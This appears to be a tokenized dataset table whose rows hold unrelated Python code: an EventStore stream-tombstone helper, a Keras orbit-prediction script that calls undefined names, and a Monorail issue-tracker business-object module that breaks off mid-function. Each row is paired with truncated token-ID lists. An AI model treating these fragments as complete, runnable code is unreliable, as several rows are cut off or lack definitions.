content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
"""
Tombstone stream.
"""
from typing import Union
from eventstore_grpc.proto import streams_pb2, streams_pb2_grpc, shared_pb2
from eventstore_grpc import constants
def tombstone_stream(
    stub: streams_pb2_grpc.StreamsStub,
    stream: str,
    expected_version: Union[int, str],
    **kwargs,
):
    """Tombstone (hard-delete) a stream.

    Args:
        stub: gRPC Streams service stub.
        stream: name of the stream to tombstone.
        expected_version: one of the ``constants.ANY`` / ``NO_STREAM`` /
            ``STREAM_EXISTS`` sentinels, or an integer exact revision.
        **kwargs: forwarded to the gRPC call (credentials, timeout, ...).

    Returns:
        The server's Tombstone response message.
    """
    request = streams_pb2.TombstoneReq()
    options = streams_pb2.TombstoneReq.Options()
    # Bug fix: the target stream was never written into the request,
    # so the server had no way to know which stream to tombstone.
    options.stream_identifier.stream_name = (
        stream.encode() if isinstance(stream, str) else stream)
    if expected_version == constants.ANY:
        options.any.CopyFrom(shared_pb2.Empty())
    elif expected_version == constants.NO_STREAM:
        options.no_stream.CopyFrom(shared_pb2.Empty())
    elif expected_version == constants.STREAM_EXISTS:
        options.stream_exists.CopyFrom(shared_pb2.Empty())
    elif isinstance(expected_version, int):
        # Bug fix: an explicit integer revision was previously ignored,
        # leaving the expected_stream_revision oneof unset.
        options.revision = expected_version
    request.options.CopyFrom(options)
    response = stub.Tombstone(request, **kwargs)
    return response
| [
37811,
198,
51,
2381,
6440,
4269,
13,
198,
37811,
198,
198,
6738,
19720,
1330,
4479,
198,
6738,
1785,
8095,
62,
2164,
14751,
13,
1676,
1462,
1330,
15190,
62,
40842,
17,
11,
15190,
62,
40842,
17,
62,
2164,
14751,
11,
4888,
62,
40842,
... | 2.648318 | 327 |
from django.apps import AppConfig
| [
6738,
42625,
14208,
13,
18211,
1330,
2034,
16934,
628
] | 3.888889 | 9 |
# Predicting the orbit trajectory

# Function created to plot the output

# Build model: instantiate a Sequential regression network.
model = Sequential()

# First Dense layer: 50 neurons, a single input feature, relu activation.
model.add(Dense(50, input_shape=(1,), activation='relu'))

# Two more hidden Dense layers, each with 50 relu neurons.
for _ in range(2):
    model.add(Dense(50, activation='relu'))

# Output head: one neuron, no activation (linear output for regression).
model.add(Dense(1))

# Compile with the Adam optimizer and mean-squared-error loss.
model.compile(optimizer='adam', loss='mse')

print("Training started..., this can take a while:")

# Fit the model on the time/position data for 30 epochs.
model.fit(time_steps, y_positions, epochs=30)

# Evaluate the trained model on the training data.
print("Final loss value:", model.evaluate(time_steps, y_positions))

# Predict the twenty minutes orbit over t in [-10, 10].
twenty_min_orbit = model.predict(np.arange(-10, 11))
plot_orbit(twenty_min_orbit)

# Predict the eighty minute orbit.  The model works well on the same time
# period used to build it, but struggles once additional time periods are
# introduced: it can only extrapolate from the data it was trained on.
eighty_min_orbit = model.predict(np.arange(-40, 41))
plot_orbit(eighty_min_orbit)
| [
2,
49461,
278,
262,
13066,
22942,
198,
198,
2,
15553,
2727,
284,
7110,
262,
5072,
198,
198,
2,
10934,
2746,
198,
2,
24470,
9386,
257,
24604,
1843,
2746,
198,
19849,
796,
24604,
1843,
3419,
198,
198,
2,
3060,
257,
360,
1072,
7679,
35... | 3.369305 | 417 |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Business objects for the Monorail issue tracker.
These are classes and functions that operate on the objects that
users care about in the issue tracker: e.g., issues, and the issue
tracker configuration.
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import collections
import logging
import time
from six import string_types
from features import federated
from framework import exceptions
from framework import framework_bizobj
from framework import framework_constants
from framework import framework_helpers
from framework import timestr
from framework import urls
from proto import tracker_pb2
from tracker import tracker_constants
def GetOwnerId(issue):
  """Return the issue's explicit owner, else derived owner, else sentinel."""
  for owner in (issue.owner_id, issue.derived_owner_id):
    if owner:
      return owner
  return framework_constants.NO_USER_SPECIFIED
def GetStatus(issue):
  """Return the explicit status of an issue, falling back to derived or ''."""
  if issue.status:
    return issue.status
  return issue.derived_status or ''
def GetCcIds(issue):
  """Return explicit Cc user IDs followed by derived Cc user IDs."""
  combined = list(issue.cc_ids)
  combined.extend(issue.derived_cc_ids)
  return combined
def GetApproverIds(issue):
  """Get the approvers' IDs across all of an issue's approval_values."""
  unique_ids = set()
  for av in issue.approval_values:
    unique_ids.update(av.approver_ids)
  return list(unique_ids)
def GetLabels(issue):
  """Return the explicit labels of an issue followed by the derived labels."""
  combined = list(issue.labels)
  combined.extend(issue.derived_labels)
  return combined
def MakeProjectIssueConfig(
    project_id, well_known_statuses, statuses_offer_merge, well_known_labels,
    excl_label_prefixes, col_spec):
  """Return a ProjectIssueConfig PB populated with the given values.

  Args:
    project_id: int project ID, or falsy for harmonized configs.
    well_known_statuses: list of (status, docstring, means_open, deprecated).
    statuses_offer_merge: list of status values that offer merging.
    well_known_labels: list of (label, docstring, deprecated) tuples.
    excl_label_prefixes: list of mutually exclusive label prefixes.
    col_spec: default issue-list column specification string.
  """
  project_config = tracker_pb2.ProjectIssueConfig()
  if project_id:  # There is no ID for harmonized configs.
    project_config.project_id = project_id
  SetConfigStatuses(project_config, well_known_statuses or [])
  project_config.statuses_offer_merge = statuses_offer_merge or []
  SetConfigLabels(project_config, well_known_labels or [])
  project_config.exclusive_label_prefixes = excl_label_prefixes or []
  # ID 0 means that nothing has been specified, so use hard-coded defaults.
  project_config.default_template_for_developers = 0
  project_config.default_template_for_users = 0
  project_config.default_col_spec = col_spec or ' '
  # Note: default project issue config has no filter rules.
  return project_config
def FindFieldDef(field_name, config):
  """Return the FieldDef whose name matches case-insensitively, or None."""
  if not field_name:
    return None
  target = field_name.lower()
  return next(
      (fd for fd in config.field_defs if fd.field_name.lower() == target),
      None)
def FindFieldDefByID(field_id, config):
  """Return the FieldDef with the given ID, or None."""
  return next(
      (fd for fd in config.field_defs if fd.field_id == field_id), None)
def FindApprovalDef(approval_name, config):
  """Find the ApprovalDef whose field has the given name, or return None."""
  fd = FindFieldDef(approval_name, config)
  return FindApprovalDefByID(fd.field_id, config) if fd else None
def FindApprovalDefByID(approval_id, config):
  """Return the ApprovalDef with the given ID, or None."""
  return next(
      (ad for ad in config.approval_defs if ad.approval_id == approval_id),
      None)
def FindApprovalValueByID(approval_id, approval_values):
  """Return the matching ApprovalValue from the given list, or None."""
  return next(
      (av for av in approval_values if av.approval_id == approval_id), None)
def FindApprovalsSubfields(approval_ids, config):
  """Return a dict of {approval_id: [subfield FieldDefs]}."""
  subfields_by_approval = collections.defaultdict(list)
  for field_def in config.field_defs:
    if field_def.approval_id in approval_ids:
      subfields_by_approval[field_def.approval_id].append(field_def)
  return subfields_by_approval
def FindPhaseByID(phase_id, phases):
  """Return the Phase with the given ID, or None."""
  return next((ph for ph in phases if ph.phase_id == phase_id), None)
def FindPhase(name, phases):
  """Return the Phase whose name matches case-insensitively, or None."""
  target = name.lower()
  return next((ph for ph in phases if ph.name.lower() == target), None)
def GetGrantedPerms(issue, effective_ids, config):
  """Return a set of permissions granted by user-valued fields in an issue."""
  granted = set()
  for fv in issue.field_values:
    if fv.user_id not in effective_ids:
      continue
    fd = FindFieldDefByID(fv.field_id, config)
    if fd and fd.grants_perm:
      # TODO(jrobbins): allow comma-separated list in grants_perm
      granted.add(fd.grants_perm.lower())
  return granted
def LabelsByPrefix(labels, lower_field_names):
  """Convert a list of key-value labels into {lower_prefix: [value, ...]}.

  It also handles custom fields with dashes in the field name.
  """
  values_by_prefix = collections.defaultdict(list)
  for lab in labels:
    if '-' not in lab:
      continue
    lower_lab = lab.lower()
    matched_field = None
    for lower_field_name in lower_field_names:
      if lower_lab.startswith(lower_field_name + '-'):
        matched_field = lower_field_name
        break
    if matched_field is not None:
      # A (possibly dashed) field name matched: split after it.
      prefix = matched_field
      value = lab[len(matched_field) + 1:]
    else:
      # No field name matched: split at the first dash.
      prefix, value = lab.split('-', 1)
      prefix = prefix.lower()
    values_by_prefix[prefix].append(value)
  return values_by_prefix
def LabelIsMaskedByField(label, field_names):
  """If the label should be displayed as a field, return the field name.

  Args:
    label: string label to consider.
    field_names: a list of field names in lowercase.

  Returns:
    If masked, return the lowercase name of the field, otherwise None. A label
    is masked by a custom field if the field name "Foo" matches the key part of
    a key-value label "Foo-Bar".
  """
  if '-' not in label:
    return None
  label_lower = label.lower()
  for field_name_lower in field_names:
    if label_lower.startswith(field_name_lower + '-'):
      return field_name_lower
  return None
def NonMaskedLabels(labels, field_names):
  """Return only those labels that are not masked by custom fields."""
  visible = []
  for lab in labels:
    if not LabelIsMaskedByField(lab, field_names):
      visible.append(lab)
  return visible
def ExplicitAndDerivedNonMaskedLabels(labels, derived_labels, config):
  """Return two lists of labels that are not masked by enum custom fields."""
  # Only non-deleted enum-type fields mask labels.
  enum_field_names = [
      fd.field_name.lower() for fd in config.field_defs
      if fd.field_type is tracker_pb2.FieldTypes.ENUM_TYPE and
      not fd.is_deleted]  # TODO(jrobbins): restricts
  visible_labels = [
      lab for lab in labels
      if not LabelIsMaskedByField(lab, enum_field_names)]
  visible_derived = [
      lab for lab in derived_labels
      if not LabelIsMaskedByField(lab, enum_field_names)]
  return visible_labels, visible_derived
def MakeApprovalValue(approval_id, approver_ids=None, status=None,
                      setter_id=None, set_on=None, phase_id=None):
  """Return an ApprovalValue PB with the given field values.

  approver_ids is only copied onto the PB when it was actually provided.
  """
  approval_value = tracker_pb2.ApprovalValue(
      approval_id=approval_id, status=status,
      setter_id=setter_id, set_on=set_on, phase_id=phase_id)
  if approver_ids is not None:
    approval_value.approver_ids = approver_ids
  return approval_value
def MakeFieldDef(
    field_id,
    project_id,
    field_name,
    field_type_int,
    applic_type,
    applic_pred,
    is_required,
    is_niche,
    is_multivalued,
    min_value,
    max_value,
    regex,
    needs_member,
    needs_perm,
    grants_perm,
    notify_on,
    date_action,
    docstring,
    is_deleted,
    approval_id=None,
    is_phase_field=False,
    is_restricted_field=False,
    admin_ids=None,
    editor_ids=None):
  """Make a FieldDef PB for the given FieldDef table row tuple.

  The arguments mirror columns of the FieldDef DB table.  Optional values
  (min_value, max_value, regex, needs_perm, approval_id, admin_ids,
  editor_ids) are only copied onto the PB when provided, so absent DB
  columns leave the corresponding PB fields unset.
  """
  # Rows may store the date action as a string name; normalize to the
  # upper-case form expected by the tracker_pb2.DateAction enum below.
  if isinstance(date_action, string_types):
    date_action = date_action.upper()
  fd = tracker_pb2.FieldDef(
      field_id=field_id,
      project_id=project_id,
      field_name=field_name,
      field_type=field_type_int,
      is_required=bool(is_required),
      is_niche=bool(is_niche),
      is_multivalued=bool(is_multivalued),
      docstring=docstring,
      is_deleted=bool(is_deleted),
      applicable_type=applic_type or '',
      applicable_predicate=applic_pred or '',
      needs_member=bool(needs_member),
      grants_perm=grants_perm or '',
      notify_on=tracker_pb2.NotifyTriggers(notify_on or 0),
      date_action=tracker_pb2.DateAction(date_action or 0),
      is_phase_field=bool(is_phase_field),
      is_restricted_field=bool(is_restricted_field))
  # Optional columns: leave the PB field unset when the value is None/empty.
  if min_value is not None:
    fd.min_value = min_value
  if max_value is not None:
    fd.max_value = max_value
  if regex is not None:
    fd.regex = regex
  if needs_perm is not None:
    fd.needs_perm = needs_perm
  if approval_id is not None:
    fd.approval_id = approval_id
  if admin_ids:
    fd.admin_ids = admin_ids
  if editor_ids:
    fd.editor_ids = editor_ids
  return fd
def MakeFieldValue(
    field_id, int_value, str_value, user_id, date_value, url_value, derived,
    phase_id=None):
  """Make a FieldValue based on the given information.

  The first non-None value among int/str/user/date/url (checked in that
  order) is stored on the FieldValue.

  Raises:
    ValueError: if none of the typed values was provided.
  """
  fv = tracker_pb2.FieldValue(field_id=field_id, derived=derived)
  if phase_id is not None:
    fv.phase_id = phase_id
  for attr, value in (('int_value', int_value), ('str_value', str_value),
                      ('user_id', user_id), ('date_value', date_value),
                      ('url_value', url_value)):
    if value is not None:
      setattr(fv, attr, value)
      return fv
  raise ValueError('Unexpected field value')
def GetFieldValueWithRawValue(field_type, field_value, users_by_id, raw_value):
  """Find and return the field value of the specified field type.

  If the specified field_value is None or is empty then the raw_value is
  returned. When the field type is USER_TYPE the raw_value is used as a key to
  lookup users_by_id.

  Args:
    field_type: tracker_pb2.FieldTypes type.
    field_value: tracker_pb2.FieldValue type.
    users_by_id: Dict mapping user_ids to UserViews.
    raw_value: String to use if field_value is not specified.

  Returns:
    Value of the specified field type.
  """
  value = GetFieldValue(field_value, users_by_id)
  if value:
    return value
  # Special case for user types: raw_value may be a users_by_id key.
  if field_type == tracker_pb2.FieldTypes.USER_TYPE:
    if raw_value in users_by_id:
      return users_by_id[raw_value].email
  return raw_value
def GetFieldValue(fv, users_by_id):
  """Return the value of this field. Give emails for users in users_by_id."""
  if fv is None:
    return None
  if fv.int_value is not None:
    return fv.int_value
  if fv.str_value is not None:
    return fv.str_value
  if fv.user_id is not None:
    try:
      return users_by_id[fv.user_id].email
    except KeyError:
      logging.info('Failed to lookup user %d when getting field', fv.user_id)
      return fv.user_id
  if fv.date_value is not None:
    return timestr.TimestampToDateWidgetStr(fv.date_value)
  if fv.url_value is not None:
    return fv.url_value
  return None
def FindComponentDef(path, config):
  """Return the ComponentDef whose path matches case-insensitively, or None."""
  target = path.lower()
  return next(
      (cd for cd in config.component_defs if cd.path.lower() == target),
      None)
def FindMatchingComponentIDs(path, config, exact=True):
  """Return a list of component IDs that match the given path.

  Args:
    path: component path to match, compared case-insensitively.
    config: config whose component_defs are searched.
    exact: pass False to also match components nested under the path.
  """
  path_lower = path.lower()
  if exact:
    return [cd.component_id for cd in config.component_defs
            if cd.path.lower() == path_lower]
  prefix = path_lower + '>'
  return [cd.component_id for cd in config.component_defs
          if (cd.path.lower() + '>').startswith(prefix)]
def FindComponentDefByID(component_id, config):
  """Return the ComponentDef with the given ID, or None."""
  return next(
      (cd for cd in config.component_defs
       if cd.component_id == component_id),
      None)
def FindAncestorComponents(config, component_def):
  """Return a list of all components the given component is under."""
  descendant_path = component_def.path.lower()
  ancestors = []
  for cd in config.component_defs:
    if descendant_path.startswith(cd.path.lower() + '>'):
      ancestors.append(cd)
  return ancestors
def GetIssueComponentsAndAncestors(issue, config):
  """Return a path-sorted list of all the components that an issue is in."""
  found = set()
  for component_id in issue.component_ids:
    cd = FindComponentDefByID(component_id, config)
    if cd is None:
      logging.error('Tried to look up non-existent component %r' % component_id)
      continue
    found.add(cd)
    found.update(FindAncestorComponents(config, cd))
  return sorted(found, key=lambda cd: cd.path)
def FindDescendantComponents(config, component_def):
  """Return a list of all nested components under the given component."""
  ancestor_prefix = component_def.path.lower() + '>'
  return [cd for cd in config.component_defs
          if cd.path.lower().startswith(ancestor_prefix)]
def MakeComponentDef(
    component_id, project_id, path, docstring, deprecated, admin_ids, cc_ids,
    created, creator_id, modified=None, modifier_id=None, label_ids=None):
  """Make a ComponentDef PB for the given FieldDef table row tuple.

  label_ids defaults to an empty list when not provided.
  """
  component_def = tracker_pb2.ComponentDef(
      component_id=component_id, project_id=project_id, path=path,
      docstring=docstring, deprecated=bool(deprecated),
      admin_ids=admin_ids, cc_ids=cc_ids, created=created,
      creator_id=creator_id, modified=modified, modifier_id=modifier_id,
      label_ids=label_ids or [])
  return component_def
def MakeSavedQuery(
    query_id, name, base_query_id, query, subscription_mode=None,
    executes_in_project_ids=None):
  """Make SavedQuery PB for the given info.

  Optional arguments are only copied onto the PB when they are not None.
  """
  saved = tracker_pb2.SavedQuery(
      name=name, base_query_id=base_query_id, query=query)
  if query_id is not None:
    saved.query_id = query_id
  if subscription_mode is not None:
    saved.subscription_mode = subscription_mode
  if executes_in_project_ids is not None:
    saved.executes_in_project_ids = executes_in_project_ids
  return saved
def SetConfigStatuses(project_config, well_known_statuses):
  """Internal method to set the well-known statuses of ProjectIssueConfig."""
  status_defs = []
  for status, docstring, means_open, deprecated in well_known_statuses:
    canonical_status = framework_bizobj.CanonicalizeLabel(status)
    status_defs.append(tracker_pb2.StatusDef(
        status=canonical_status, status_docstring=docstring,
        means_open=means_open, deprecated=deprecated))
  project_config.well_known_statuses = status_defs
def SetConfigLabels(project_config, well_known_labels):
  """Internal method to set the well-known labels of a ProjectIssueConfig."""
  label_defs = []
  for label, docstring, deprecated in well_known_labels:
    canonical_label = framework_bizobj.CanonicalizeLabel(label)
    label_defs.append(tracker_pb2.LabelDef(
        label=canonical_label, label_docstring=docstring,
        deprecated=deprecated))
  project_config.well_known_labels = label_defs
def SetConfigApprovals(project_config, approval_def_tuples):
  """Internal method to set up approval defs of a ProjectIssueConfig."""
  approval_defs = []
  for approval_id, approver_ids, survey in approval_def_tuples:
    approval_defs.append(tracker_pb2.ApprovalDef(
        approval_id=approval_id, approver_ids=approver_ids, survey=survey))
  project_config.approval_defs = approval_defs
def ConvertDictToTemplate(template_dict):
  """Construct a Template PB with the values from template_dict.

  Args:
    template_dict: dictionary with fields corresponding to the Template
        PB fields.

  Returns:
    A Template protocol buffer that can be stored in the
    project's ProjectIssueConfig PB.
  """
  get = template_dict.get
  return MakeIssueTemplate(
      get('name'), get('summary'), get('status'), get('owner_id'),
      get('content'), get('labels'), [], [], get('components'),
      summary_must_be_edited=get('summary_must_be_edited'),
      owner_defaults_to_member=get('owner_defaults_to_member'),
      component_required=get('component_required'),
      members_only=get('members_only'))
def MakeIssueTemplate(
    name,
    summary,
    status,
    owner_id,
    content,
    labels,
    field_values,
    admin_ids,
    component_ids,
    summary_must_be_edited=None,
    owner_defaults_to_member=None,
    component_required=None,
    members_only=None,
    phases=None,
    approval_values=None):
  """Make an issue template PB.

  Args:
    name: template name.
    summary: default issue summary; only set when truthy.
    status: default issue status; only set when truthy.
    owner_id: default owner user ID; only set when truthy.
    content: default issue description content.
    labels: list of default labels (None becomes []).
    field_values: list of default FieldValue PBs.
    admin_ids: user IDs allowed to administer this template.
    component_ids: default component IDs (None becomes []).
    summary_must_be_edited: optional bool; only set when not None.
    owner_defaults_to_member: optional bool; only set when not None.
    component_required: optional bool; only set when not None.
    members_only: optional bool; only set when not None.
    phases: optional list of phases; only set when not None.
    approval_values: optional list of ApprovalValue PBs (None becomes []).

  Returns:
    A populated tracker_pb2.TemplateDef.
  """
  template = tracker_pb2.TemplateDef()
  template.name = name
  if summary:
    template.summary = summary
  if status:
    template.status = status
  if owner_id:
    template.owner_id = owner_id
  template.content = content
  template.field_values = field_values
  template.labels = labels or []
  template.admin_ids = admin_ids
  template.component_ids = component_ids or []
  template.approval_values = approval_values or []
  # Tri-state options: None means "leave unset", False is meaningful.
  if summary_must_be_edited is not None:
    template.summary_must_be_edited = summary_must_be_edited
  if owner_defaults_to_member is not None:
    template.owner_defaults_to_member = owner_defaults_to_member
  if component_required is not None:
    template.component_required = component_required
  if members_only is not None:
    template.members_only = members_only
  if phases is not None:
    template.phases = phases
  return template
def MakeDefaultProjectIssueConfig(project_id):
  """Return a ProjectIssueConfig for use by projects that don't have one."""
  defaults = (
      tracker_constants.DEFAULT_WELL_KNOWN_STATUSES,
      tracker_constants.DEFAULT_STATUSES_OFFER_MERGE,
      tracker_constants.DEFAULT_WELL_KNOWN_LABELS,
      tracker_constants.DEFAULT_EXCL_LABEL_PREFIXES,
      tracker_constants.DEFAULT_COL_SPEC)
  return MakeProjectIssueConfig(project_id, *defaults)
def HarmonizeConfigs(config_list):
  """Combine several ProjectIssueConfigs into one for cross-project sorting.

  Args:
    config_list: a list of ProjectIssueConfig PBs with labels and statuses
        among other fields.

  Returns:
    A new ProjectIssueConfig with just the labels and status values filled
    in to be a logical union of the given configs. Specifically, the order
    of the combined status and label lists should be maintained.
  """
  if not config_list:
    return MakeDefaultProjectIssueConfig(None)
  # Merge each project's ordered status/label lists into one global order.
  harmonized_status_names = _CombineOrderedLists(
      [[stat.status for stat in config.well_known_statuses]
       for config in config_list])
  harmonized_label_names = _CombineOrderedLists(
      [[lab.label for lab in config.well_known_labels]
       for config in config_list])
  harmonized_default_sort_spec = ' '.join(
      config.default_sort_spec for config in config_list)
  # A status counts as "open" if any of the projects treats it as open.
  harmonized_means_open = {
      status: any([stat.means_open
                   for config in config_list
                   for stat in config.well_known_statuses
                   if stat.status == status])
      for status in harmonized_status_names}
  # This col_spec is probably not what the user wants to view because it is
  # too much information. We join all the col_specs here so that we are sure
  # to lookup all users needed for sorting, even if it is more than needed.
  # xxx we need to look up users based on colspec rather than sortspec?
  harmonized_default_col_spec = ' '.join(
      config.default_col_spec for config in config_list)
  result_config = tracker_pb2.ProjectIssueConfig()
  # The combined config is only used during sorting, never stored.
  result_config.default_col_spec = harmonized_default_col_spec
  result_config.default_sort_spec = harmonized_default_sort_spec
  for status_name in harmonized_status_names:
    result_config.well_known_statuses.append(tracker_pb2.StatusDef(
        status=status_name, means_open=harmonized_means_open[status_name]))
  for label_name in harmonized_label_names:
    result_config.well_known_labels.append(tracker_pb2.LabelDef(
        label=label_name))
  for config in config_list:
    # Deleted field defs are dropped; everything else is unioned.
    result_config.field_defs.extend(
        list(fd for fd in config.field_defs if not fd.is_deleted))
    result_config.component_defs.extend(config.component_defs)
    result_config.approval_defs.extend(config.approval_defs)
  return result_config
def HarmonizeLabelOrStatusRows(def_rows):
  """Put the given label defs into a logical global order.

  Args:
    def_rows: list of DB rows shaped (def_id, project_id, rank, label, ...).

  Returns:
    A list of (def_id, rank, label) tuples: the unranked ("oddball") defs
    sorted in reverse case-insensitive label order, followed by the ranked
    defs merged across projects while preserving each project's ordering.
  """
  ranked_defs_by_project = {}
  oddball_defs = []
  for row in def_rows:
    def_id, project_id, rank, label = row[0], row[1], row[2], row[3]
    if rank is not None:
      ranked_defs_by_project.setdefault(project_id, []).append(
          (def_id, rank, label))
    else:
      # Defs without an explicit rank are kept aside and sorted by label.
      oddball_defs.append((def_id, rank, label))
  oddball_defs.sort(reverse=True, key=lambda def_tuple: def_tuple[2].lower())
  # Compose the list-of-lists in a consistent order by project_id.
  list_of_lists = [ranked_defs_by_project[pid]
                   for pid in sorted(ranked_defs_by_project.keys())]
  harmonized_ranked_defs = _CombineOrderedLists(
      list_of_lists, include_duplicate_keys=True,
      key=lambda def_tuple: def_tuple[2])
  return oddball_defs + harmonized_ranked_defs
def _CombineOrderedLists(
    list_of_lists, include_duplicate_keys=False, key=lambda x: x):
  """Combine lists of items while maintaining their desired order.

  Args:
    list_of_lists: a list of lists of strings.
    include_duplicate_keys: Pass True to make the combined list have the
        same total number of elements as the sum of the input lists.
    key: optional function to choose which part of the list items hold the
        string used for comparison. The result will have the whole items.

  Returns:
    A single list of items containing one copy of each of the items
    in any of the original list, and in an order that maintains the original
    list ordering as much as possible.
  """
  combined_items = []
  combined_keys = []
  seen_keys = set()
  for item_list in list_of_lists:
    _AccumulateCombinedList(
        item_list, combined_items, combined_keys, seen_keys, key=key,
        include_duplicate_keys=include_duplicate_keys)
  return combined_items
def _AccumulateCombinedList(
    one_list, combined_items, combined_keys, seen_keys_set,
    include_duplicate_keys=False, key=lambda x: x):
  """Accumulate strings into a combined list while its maintaining ordering.

  Args:
    one_list: list of strings in a desired order.
    combined_items: accumulated list of items in the desired order.
    combined_keys: accumulated list of key strings in the desired order.
    seen_keys_set: set of strings that are already in combined_list.
    include_duplicate_keys: Pass True to make the combined list have the
        same total number of elements as the sum of the input lists.
    key: optional function to choose which part of the list items hold the
        string used for comparison. The result will have the whole items.

  Returns:
    Nothing. But, combined_items is modified to mix in all the items of
    one_list at appropriate points such that nothing in combined_items
    is reordered, and the ordering of items from one_list is maintained
    as much as possible. Also, seen_keys_set is modified to add any keys
    for items that were added to combined_items.

    Also, any strings that begin with "#" are compared regardless of the "#".
    The purpose of such strings is to guide the final ordering.
  """
  insert_idx = 0
  for item in one_list:
    # Keys are compared case-insensitively.
    s = key(item).lower()
    if s in seen_keys_set:
      # Key already placed: advance the insertion point past its existing
      # position so later items from one_list keep their relative order.
      item_idx = combined_keys.index(s)  # Need parallel list of keys
      insert_idx = max(insert_idx, item_idx + 1)
    if s not in seen_keys_set or include_duplicate_keys:
      combined_items.insert(insert_idx, item)
      combined_keys.insert(insert_idx, s)
      insert_idx += 1
    seen_keys_set.add(s)
def GetBuiltInQuery(query_id):
  """Return the conditions string for a built-in query ID, or ''."""
  canned_queries = tracker_constants.DEFAULT_CANNED_QUERY_CONDS
  return canned_queries.get(query_id, '')
def UsersInvolvedInAmendments(amendments):
  """Return a set of all user IDs mentioned in the given Amendments."""
  return {
      user_id
      for amendment in amendments
      for id_list in (amendment.added_user_ids, amendment.removed_user_ids)
      for user_id in id_list}
def _AccumulateUsersInvolvedInComment(comment, user_id_set):
  """Build up a set of all users involved in an IssueComment.

  Args:
    comment: an IssueComment PB.
    user_id_set: a set of user IDs to build up.

  Returns:
    The same set, but modified to have the user IDs of user who
    entered the comment, and all the users mentioned in any amendments.
  """
  user_id_set.add(comment.user_id)
  user_id_set |= UsersInvolvedInAmendments(comment.amendments)
  return user_id_set
def UsersInvolvedInComment(comment):
  """Return a set of all users involved in an IssueComment.

  Args:
    comment: an IssueComment PB.

  Returns:
    A set with the user IDs of user who entered the comment, and all the
    users mentioned in any amendments.
  """
  involved = set()
  _AccumulateUsersInvolvedInComment(comment, involved)
  return involved
def UsersInvolvedInCommentList(comments):
  """Return a set of all users involved in a list of IssueComments.

  Args:
    comments: a list of IssueComment PBs.

  Returns:
    A set with the user IDs of user who entered the comment, and all the
    users mentioned in any amendments.
  """
  involved = set()
  for comment in comments:
    _AccumulateUsersInvolvedInComment(comment, involved)
  return involved
def UsersInvolvedInIssues(issues):
  """Return a set of all user IDs referenced in the issues' metadata."""
  involved = set()
  for issue in issues:
    involved.add(issue.reporter_id)
    involved.add(issue.owner_id)
    involved.add(issue.derived_owner_id)
    involved.update(issue.cc_ids, issue.derived_cc_ids)
    # Only user-valued field values contribute a user ID.
    involved.update(fv.user_id for fv in issue.field_values if fv.user_id)
    for av in issue.approval_values:
      involved.update(av.approver_ids)
      if av.setter_id:
        involved.add(av.setter_id)
  return involved
def UsersInvolvedInTemplate(template):
  """Return a set of all user IDs referenced in the template."""
  involved = set(template.admin_ids)
  involved.update(fv.user_id for fv in template.field_values if fv.user_id)
  if template.owner_id:
    involved.add(template.owner_id)
  for av in template.approval_values:
    involved.update(av.approver_ids)
    if av.setter_id:
      involved.add(av.setter_id)
  return involved
def UsersInvolvedInTemplates(templates):
  """Return a set of all user IDs referenced in the given templates."""
  involved = set()
  for tmpl in templates:
    involved |= UsersInvolvedInTemplate(tmpl)
  return involved
def UsersInvolvedInComponents(component_defs):
  """Return a set of user IDs referenced in the given components."""
  involved = set()
  for cd in component_defs:
    involved.update(cd.admin_ids, cd.cc_ids)
    # Creator/modifier are only counted when set to a real user ID.
    if cd.creator_id:
      involved.add(cd.creator_id)
    if cd.modifier_id:
      involved.add(cd.modifier_id)
  return involved
def UsersInvolvedInApprovalDefs(approval_defs, matching_fds):
  # type: (Sequence[proto.tracker_pb2.ApprovalDef],
  #   Sequence[proto.tracker_pb2.FieldDef]) -> Collection[int]
  """Return a set of user IDs referenced in the approval_defs and field defs"""
  involved = set()
  for approval_def in approval_defs:
    involved.update(approval_def.approver_ids)
  for field_def in matching_fds:
    involved.update(field_def.admin_ids)
  return involved
def UsersInvolvedInConfig(config):
  """Return a set of all user IDs referenced in the config."""
  involved = set()
  for ad in config.approval_defs:
    involved.update(ad.approver_ids)
  for fd in config.field_defs:
    involved.update(fd.admin_ids)
  involved |= UsersInvolvedInComponents(config.component_defs)
  return involved
def LabelIDsInvolvedInConfig(config):
  """Return a set of all label IDs referenced in the config."""
  return {
      label_id
      for cd in config.component_defs
      for label_id in cd.label_ids}
def MakeIssueDelta(
    status, owner_id, cc_ids_add, cc_ids_remove, comp_ids_add, comp_ids_remove,
    labels_add, labels_remove, field_vals_add, field_vals_remove, fields_clear,
    blocked_on_add, blocked_on_remove, blocking_add, blocking_remove,
    merged_into, summary, ext_blocked_on_add=None, ext_blocked_on_remove=None,
    ext_blocking_add=None, ext_blocking_remove=None, merged_into_external=None):
  """Construct an IssueDelta object with the given fields, iff non-None.

  The add/remove list arguments are always copied onto the delta; the
  scalar arguments (status, owner_id, merged_into, merged_into_external,
  summary) and the ext_* lists are only set when not None, so that an
  unset field means "no change to this aspect of the issue".
  """
  delta = tracker_pb2.IssueDelta(
      cc_ids_add=cc_ids_add, cc_ids_remove=cc_ids_remove,
      comp_ids_add=comp_ids_add, comp_ids_remove=comp_ids_remove,
      labels_add=labels_add, labels_remove=labels_remove,
      field_vals_add=field_vals_add, field_vals_remove=field_vals_remove,
      fields_clear=fields_clear,
      blocked_on_add=blocked_on_add, blocked_on_remove=blocked_on_remove,
      blocking_add=blocking_add, blocking_remove=blocking_remove)
  if status is not None:
    delta.status = status
  if owner_id is not None:
    delta.owner_id = owner_id
  if merged_into is not None:
    delta.merged_into = merged_into
  if merged_into_external is not None:
    delta.merged_into_external = merged_into_external
  if summary is not None:
    delta.summary = summary
  if ext_blocked_on_add is not None:
    delta.ext_blocked_on_add = ext_blocked_on_add
  if ext_blocked_on_remove is not None:
    delta.ext_blocked_on_remove = ext_blocked_on_remove
  if ext_blocking_add is not None:
    delta.ext_blocking_add = ext_blocking_add
  if ext_blocking_remove is not None:
    delta.ext_blocking_remove = ext_blocking_remove
  return delta
def ApplyLabelChanges(issue, config, labels_add, labels_remove):
  """Updates the PB issue's labels and returns the amendment or None."""
  def _CanonicalizeAll(raw_labels):
    # Canonicalize and drop any labels that canonicalize to nothing.
    canon = (framework_bizobj.CanonicalizeLabel(l) for l in raw_labels)
    return [l for l in canon if l]

  labels_add = _CanonicalizeAll(labels_add)
  labels_remove = _CanonicalizeAll(labels_remove)
